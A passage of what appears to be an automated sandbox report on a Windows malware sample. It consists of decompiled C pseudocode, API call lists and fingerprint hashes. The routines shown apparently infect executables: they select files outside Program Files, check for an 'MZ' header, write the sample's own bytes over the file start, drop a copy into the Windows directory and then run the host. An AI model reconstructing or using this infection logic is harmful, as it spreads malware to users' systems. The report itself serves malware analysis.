                                                            													E00406218(_v52, 0x28, 5, _t378, __eflags);
                                                            												} else {
                                                            													_t229 = _t220 - 1;
                                                            													__eflags = _t229;
                                                            													if(__eflags == 0) {
                                                            														E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                            													} else {
                                                            														_t232 = _t229 - 3;
                                                            														__eflags = _t232;
                                                            														if(__eflags == 0) {
                                                            															E00406218(_v52, 0x28, 2, _t378, __eflags);
                                                            														} else {
                                                            															__eflags = _t232 - 4;
                                                            															if(__eflags == 0) {
                                                            																E00406218(_v52, 0x28, 3, _t378, __eflags);
                                                            															}
                                                            														}
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            										__eflags =  *(_v52 + 0x41);
                                                            										if(__eflags == 0) {
                                                            											L54:
                                                            											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                            											E00406218(_v56, 0x28, 1, _t378, __eflags);
                                                            											E00406624(_t293, _t375);
                                                            											_t199 = E0040598C(_v32);
                                                            											_t201 = E00406624(_t293, _t375);
                                                            											__eflags = _t199 - _t201;
                                                            											if(_t199 == _t201) {
                                                            												goto L56;
                                                            											} else {
                                                            												E00402BEC();
                                                            												goto L59;
                                                            											}
                                                            										} else {
                                                            											_t207 = E0040598C(_v32);
                                                            											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
                                                            											if(_t207 == (_v18 & 0x0000ffff) << 2) {
                                                            												E004065CC(_t293, _t375, _t378);
                                                            												_t212 = E0040598C(_v32);
                                                            												_t214 = E004065CC(_t293, _t375, _t378);
                                                            												_pop(0x28);
                                                            												__eflags = _t212 - _t214;
                                                            												if(__eflags == 0) {
                                                            													goto L54;
                                                            												} else {
                                                            													E00402BEC();
                                                            													goto L59;
                                                            												}
                                                            											} else {
                                                            												E00402BEC();
                                                            												goto L59;
                                                            											}
                                                            										}
                                                            									} else {
                                                            										E00402BEC();
                                                            										goto L59;
                                                            									}
                                                            								} else {
                                                            									__eflags = _v48;
                                                            									if(_v48 == 0) {
                                                            										goto L57;
                                                            									} else {
                                                            										goto L26;
                                                            									}
                                                            								}
                                                            								goto L60;
                                                            								L56:
                                                            								_v40 = _v40 + 1;
                                                            								_v80 =  &(_v80[2]);
                                                            								_t130 =  &_v72;
                                                            								 *_t130 = _v72 - 1;
                                                            								__eflags =  *_t130;
                                                            							} while ( *_t130 != 0);
                                                            							goto L57;
                                                            						}
                                                            					} else {
                                                            						_v72 = _t152 + 1;
                                                            						_v76 = _v24;
                                                            						while(1) {
                                                            							_t369 =  *_v76;
                                                            							_v48 = _v76[1];
                                                            							if(_t369 == 0 && _v48 == 0) {
                                                            								goto L22;
                                                            							}
                                                            							GetObjectA(_v48, 0x18,  &_v144);
                                                            							_t294 = _v140;
                                                            							_t376 = _v136;
                                                            							if(_t369 != 0) {
                                                            								GetObjectA(_t369, 0x18,  &_v144);
                                                            							}
                                                            							E00402660( &_v20, 0x10);
                                                            							_v20 = _t294;
                                                            							_v19 = _t376;
                                                            							if(_t369 != 0) {
                                                            								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed
                                                            								E004061E0(_v52, _t255, __eflags);
                                                            								E00402660( &_v120, 0x28);
                                                            								_v120 = 0x28;
                                                            								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
                                                            								_t264 = _v128;
                                                            								__eflags = _t264 - 1;
                                                            								if(_t264 != 1) {
                                                            									L14:
                                                            									_t310 = _v126;
                                                            									__eflags = 1 - 0x10;
                                                            									if(1 >= 0x10) {
                                                            										__eflags = 1 - 0x100;
                                                            										if(1 >= 0x100) {
                                                            											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
                                                            											_v18 = 0;
                                                            											_v17 = 1;
                                                            										} else {
                                                            											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
                                                            											_v18 = 0x10;
                                                            										}
                                                            									} else {
                                                            										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
                                                            										_v18 = 2;
                                                            									}
                                                            								} else {
                                                            									__eflags = _v126 - 0xf;
                                                            									if(_v126 < 0xf) {
                                                            										goto L14;
                                                            									} else {
                                                            										_v18 = 0;
                                                            										_v17 = 0;
                                                            										_v14 = _v126;
                                                            									}
                                                            								}
                                                            							} else {
                                                            								_v18 = 2;
                                                            							}
                                                            							E004045E8(_v68, 0xbadbad);
                                                            							_t274 = E004065CC(_t294, _t376, _t378);
                                                            							_t275 = E00406598(_t378);
                                                            							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
                                                            							_v8 = _v44;
                                                            							if(E0040598C(_v32) == 0x10) {
                                                            								_v44 = _v44 + _v12;
                                                            								_v76 =  &(_v76[2]);
                                                            								_t66 =  &_v72;
                                                            								 *_t66 = _v72 - 1;
                                                            								__eflags =  *_t66;
                                                            								if( *_t66 != 0) {
                                                            									continue;
                                                            								} else {
                                                            									goto L22;
                                                            								}
                                                            							} else {
                                                            								E00402BEC();
                                                            								goto L59;
                                                            							}
                                                            							goto L60;
                                                            						}
                                                            						goto L22;
                                                            					}
                                                            				}
                                                            				L60:
                                                            			}


                                                            APIs
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                            • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                            • CopyImage.USER32(00000000,00000000,?,?,00000000), ref: 00406977
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 004069FE
                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00406752
                                                              • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                              • Part of subcall function 00406154: 72E7AC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                              • Part of subcall function 00406154: 72E7A7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                              • Part of subcall function 00406154: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                            • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00406A93
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$CopyImage$B380
                                                            • String ID: (
                                                            • API String ID: 1117845954-3887548279
                                                            • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                            • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                            • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                            • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 83%
                                                            			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v9;
                                                            				char _v16;
                                                            				char _v40254;
                                                            				char _v41487;
                                                            				char _v41488;
                                                            				char _v41492;
                                                            				char _v41496;
                                                            				char _v41500;
                                                            				char _v41504;
                                                            				void* _t45;
                                                            				void* _t80;
                                                            				void* _t82;
                                                            				long _t85;
                                                            				CHAR* _t130;
                                                            				intOrPtr _t150;
                                                            				void* _t154;
                                                            				void* _t155;
                                                            				long _t173;
                                                            				void* _t177;
                                                            				void* _t178;
                                                            
                                                            				_t128 = __ebx;
                                                            				_t177 = _t178;
                                                            				_push(__eax);
                                                            				_t45 = 0xa;
                                                            				goto L1;
                                                            				L17:
                                                            				_pop(_t150);
                                                            				 *[fs:eax] = _t150;
                                                            				_push(E00407493);
                                                            				E004030B8( &_v41504, 4);
                                                            				return E00403094( &_v8);
                                                            				L1:
                                                            				_t178 = _t178 + 0xfffff004;
                                                            				_push(_t45);
                                                            				_t45 = _t45 - 1;
                                                            				_t180 = _t45;
                                                            				if(_t45 != 0) {
                                                            					goto L1;
                                                            				} else {
                                                            					_push(__ebx);
                                                            					_v41504 = 0;
                                                            					_v41500 = 0;
                                                            					_v41496 = 0;
                                                            					_v41492 = 0;
                                                            					E004033FC(_v8);
                                                            					_push(_t177);
                                                            					_push(0x40748c);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t178 + 0xfffffde8;
                                                            					_v9 = 0;
                                                            					E004031F4( &_v41492, 3, 0x4091c0);
                                                            					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
                                                            						E00404F34(_v8,  &_v41496);
                                                            						E0040312C( &_v8, _v41496);
                                                            						E00404F90( &_v41500, _t128, 3);
                                                            						_push(E0040340C(_v41500));
                                                            						_t129 = E0040340C(_v8);
                                                            						_pop(_t154);
                                                            						if(E00404B38(_t68, _t154) == 0) {
                                                            							E00405008( &_v41504, _t129, 3);
                                                            							_t155 = E0040340C(_v41504);
                                                            							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
                                                            								_t80 = E00404F6C(_v8);
                                                            								if(_t80 > 0xa200 && _t80 <= 0x989680) {
                                                            									_t82 = E00407130(_v8, _t129); // executed
                                                            									if(_t82 == 0) {
                                                            										_v9 = 1;
                                                            										_t130 = E0040340C(_v8);
                                                            										_t85 = GetFileAttributesA(_t130); // executed
                                                            										_t173 = _t85;
                                                            										if((_t173 & 0x00000001) > 0) {
                                                            											SetFileAttributesA(_t130, 0);
                                                            										}
                                                            										_t131 = E00405BDC();
                                                            										_t175 = E004064CC();
                                                            										E00406CA8(_t87, 0, _v8);
                                                            										E00406510(_t175, _t86);
                                                            										E00405974();
                                                            										E00404198();
                                                            										E00405988(_t131);
                                                            										E00404520(_t131);
                                                            										E00404520(_t175);
                                                            										_t132 = E00404B68(_v8, 0xc0000303);
                                                            										if(_t103 != 0xffffffff) {
                                                            											E00404BC4(_t132, 2,  &_v41488);
                                                            											if(_v41488 == 0x4d && _v41487 == 0x5a) {
                                                            												E00404BB4(_t132, 0, 0);
                                                            												E00404BC4(_t132, 0xa200,  &_v41488);
                                                            												E0040254C( &_v40254, 4,  &_v16);
                                                            												E00407080( &_v41488, _v16, 0x3e8);
                                                            												E00404BB4(_t132, 0, 0);
                                                            												E00404BE0(_t132, 0xa200, 0x40a698);
                                                            												E00404BB4(_t132, 2, 0);
                                                            												E00404BE0(_t132, 0xa200,  &_v41488);
                                                            											}
                                                            										}
                                                            										E00404B90(_t132);
                                                            										if((_t173 & 0x00000001) > 0) {
                                                            											SetFileAttributesA(E0040340C(_v8), _t173);
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					goto L17;
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                              • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                              • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                              • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                              • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Attributes$CreatePointerReadWrite
                                                            • String ID: M$MZP$Z$\PROGRA~1\
                                                            • API String ID: 997383822-4093836345
                                                            • Opcode ID: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                            • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                            • Opcode Fuzzy Hash: 3325f7f34ba1cab3d3c53affcca57471aa0c7a6c0db11dbc350d39af7ef534dd
                                                            • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00401788() {
                                                            				void* _t11;
                                                            				signed int _t13;
                                                            				intOrPtr _t19;
                                                            				void* _t20;
                                                            				intOrPtr _t23;
                                                            
                                                            				_push(_t23);
                                                            				_push(E0040183E);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t23;
                                                            				_push(0x40a5b4);
                                                            				L004010DC();
                                                            				if( *0x40a035 != 0) {
                                                            					_push(0x40a5b4);
                                                            					L004010E4();
                                                            				}
                                                            				E0040114C(0x40a5d4);
                                                            				E0040114C(0x40a5e4);
                                                            				E0040114C(0x40a610);
                                                            				_t11 = LocalAlloc(0, 0xff8); // executed
                                                            				 *0x40a60c = _t11;
                                                            				if( *0x40a60c != 0) {
                                                            					_t13 = 3;
                                                            					do {
                                                            						_t20 =  *0x40a60c; // 0x4809d0
                                                            						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                            						_t13 = _t13 + 1;
                                                            					} while (_t13 != 0x401);
                                                            					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
                                                            					 *0x40a5f4 = 0x40a5f4;
                                                            					 *0x40a600 = 0x40a5f4;
                                                            					 *0x40a5ac = 1;
                                                            				}
                                                            				_pop(_t19);
                                                            				 *[fs:eax] = _t19;
                                                            				_push(0x401845);
                                                            				if( *0x40a035 != 0) {
                                                            					_push(0x40a5b4);
                                                            					L004010EC();
                                                            					return 0;
                                                            				}
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                            • String ID:
                                                            • API String ID: 730355536-0
                                                            • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                            • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                            • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                            • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				intOrPtr* _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				signed int _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				struct _ICONINFO _v48;
                                                            				void* _t65;
                                                            				void* _t72;
                                                            				signed int _t81;
                                                            				intOrPtr* _t82;
                                                            				intOrPtr* _t85;
                                                            				void* _t98;
                                                            				void* _t99;
                                                            				intOrPtr _t103;
                                                            				intOrPtr _t104;
                                                            				signed int _t111;
                                                            				intOrPtr* _t112;
                                                            				intOrPtr _t116;
                                                            				intOrPtr _t117;
                                                            				void* _t118;
                                                            				void* _t119;
                                                            				void* _t120;
                                                            				void* _t121;
                                                            				void* _t124;
                                                            
                                                            				_v28 = 0;
                                                            				_v16 = __ecx;
                                                            				_v12 = __edx;
                                                            				_v8 = __eax;
                                                            				_push(_t124);
                                                            				_push(0x406c97);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t124 + 0xffffffd4;
                                                            				_t116 = _v12;
                                                            				if(_t116 < 0) {
                                                            					L8:
                                                            					_v24 = E00405968();
                                                            					_push(_v12 + 1 + _v12 + 1);
                                                            					E00403B24();
                                                            					_t117 = _v12;
                                                            					if(_t117 >= 0) {
                                                            						_t120 = _t117 + 1;
                                                            						_v20 = 0;
                                                            						_t85 = _v8;
                                                            						do {
                                                            							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
                                                            							_t81 = _v20 + _v20;
                                                            							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
                                                            							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
                                                            							_v20 = _v20 + 1;
                                                            							_t85 = _t85 + 4;
                                                            							_t120 = _t120 - 1;
                                                            						} while (_t120 != 0);
                                                            					}
                                                            					_t65 = E00406638(_v28, _v16, E00403970()); // executed
                                                            					if(_t65 == 0) {
                                                            						E00405990(_v16);
                                                            					}
                                                            					_t118 = E00403970();
                                                            					if(_t118 >= 0) {
                                                            						_t119 = _t118 + 1;
                                                            						_v20 = 0;
                                                            						do {
                                                            							_t72 =  *(_v28 + _v20 * 4);
                                                            							if(_t72 != 0) {
                                                            								DeleteObject(_t72);
                                                            							}
                                                            							_v20 = _v20 + 1;
                                                            							_t119 = _t119 - 1;
                                                            						} while (_t119 != 0);
                                                            					}
                                                            				} else {
                                                            					_t121 = _t116 + 1;
                                                            					_v20 = 0;
                                                            					_t82 = _v8;
                                                            					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
                                                            						_t111 = _v20 + 1;
                                                            						_t98 = _v12 - _t111;
                                                            						if(_t98 < 0) {
                                                            							L7:
                                                            							_v20 = _v20 + 1;
                                                            							_t82 = _t82 + 4;
                                                            							_t121 = _t121 - 1;
                                                            							if(_t121 != 0) {
                                                            								continue;
                                                            							} else {
                                                            								goto L8;
                                                            							}
                                                            						} else {
                                                            							_t99 = _t98 + 1;
                                                            							_t112 = _v8 + _t111 * 4;
                                                            							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
                                                            								_t112 = _t112 + 4;
                                                            								_t99 = _t99 - 1;
                                                            								if(_t99 != 0) {
                                                            									continue;
                                                            								} else {
                                                            									goto L7;
                                                            								}
                                                            								goto L18;
                                                            							}
                                                            						}
                                                            						goto L18;
                                                            					}
                                                            				}
                                                            				L18:
                                                            				_pop(_t103);
                                                            				 *[fs:eax] = _t103;
                                                            				_push(E00406C9E);
                                                            				_t104 =  *0x406b28; // 0x406b2c
                                                            				return E00403B30( &_v28, _t104);
                                                            			}
                                                            Statement address column for E00406B48 (0x00406b53 .. 0x00406c96); per-statement alignment with the C-Code listing above was lost in extraction.

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteIconInfoObject
                                                            • String ID: ,k@
                                                            • API String ID: 2689914137-1053005162
                                                            • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                            • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                            • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                            • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				char* _t39;
                                                            				void* _t40;
                                                            				void* _t46;
                                                            				intOrPtr _t57;
                                                            				void* _t61;
                                                            
                                                            				_t60 = __esi;
                                                            				_t59 = __edi;
                                                            				_t46 = __ecx;
                                                            				_t45 = __ebx;
                                                            				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
                                                            				E00404EEC(_t61 - 0xa240);
                                                            				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240)))); // executed
                                                            				_push(1);
                                                            				_push(0);
                                                            				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);
                                                            				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
                                                            				E00405008(_t61 - 0xa250, _t45, _t46);
                                                            				E004031F4(_t61 - 0xa254, 9, 0x4091b4);
                                                            				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
                                                            				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
                                                            				E004032CC();
                                                            				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
                                                            				_t40 =  *0x40a650; // 0x400000
                                                            				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250)); // executed
                                                            				_pop(_t57);
                                                            				 *[fs:eax] = _t57;
                                                            				_push(E00407993);
                                                            				return E004030B8(_t61 - 0xa25c, 0x14);
                                                            			}
                                                            Statement address column for E004078A6 (0x004078a6 .. 0x0040798b); per-statement alignment with the C-Code listing above was lost in extraction.

                                                            APIs
                                                              • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                              • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                              • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                            • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                            • String ID: open
                                                            • API String ID: 2622400689-2758837156
                                                            • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                            • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                            • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                            • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				void* _t31;
                                                            				void* _t59;
                                                            				intOrPtr _t73;
                                                            				void* _t82;
                                                            				void* _t83;
                                                            				intOrPtr _t86;
                                                            
                                                            				_t83 = __esi;
                                                            				_t82 = __edi;
                                                            				_t54 = __ebx;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(_t86);
                                                            				_push(0x407ac4);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t86;
                                                            				E00407080(0x4091e0, 0xb, 0xb);
                                                            				E004031F4( &_v12, 0xb, 0x4091e0);
                                                            				_push(_v12);
                                                            				E00404F90( &_v16, __ebx, 0xb);
                                                            				_pop(_t59);
                                                            				E00403258( &_v8, _t59, _v16);
                                                            				if(E00404B9C() != 0) {
                                                            					DeleteFileA(E0040340C(_v8));
                                                            				}
                                                            				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
                                                            				if(_t31 != 0) {
                                                            					E00407080(0x4091ec, 0x1a, 0x1a);
                                                            					E004031F4( &_v20, 0x1a, 0x4091ec);
                                                            					_t55 = E0040575C(0x80000000, 0x1a, _v20);
                                                            					E00407080(0x409208, 8, 8);
                                                            					E004031F4( &_v28, 8, 0x409208);
                                                            					E00403258( &_v24, _v28, _v8);
                                                            					E0040578C(_t40, _v24, 0);
                                                            					E004057CC(_t55);
                                                            				}
                                                            				_pop(_t73);
                                                            				 *[fs:eax] = _t73;
                                                            				_push(E00407ACB);
                                                            				return E004030B8( &_v28, 6);
                                                            			}
                                                            Statement address column for E004079A0 (0x004079a0 .. 0x00407ac3); per-statement alignment with the C-Code listing above was lost in extraction.

                                                            APIs
                                                              • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                              • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                            • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$AttributesDeleteDirectoryWindows
                                                            • String ID: MZP
                                                            • API String ID: 3550186980-2889622443
                                                            • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                            • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                            • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                            • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404BC4(void* __eax, long __ecx, void* __edx) {
                                                            				int _t2;
                                                            				void* _t3;
                                                            				DWORD* _t8;
                                                            
                                                            				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
                                                            				_t3 = 0;
                                                            				if(_t2 == 0) {
                                                            					return 0;
                                                            				}
                                                            				return _t3;
                                                            			}

                                                            Instruction addresses: 0x00404bcf - 0x00404bdc

                                                            APIs
                                                            • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
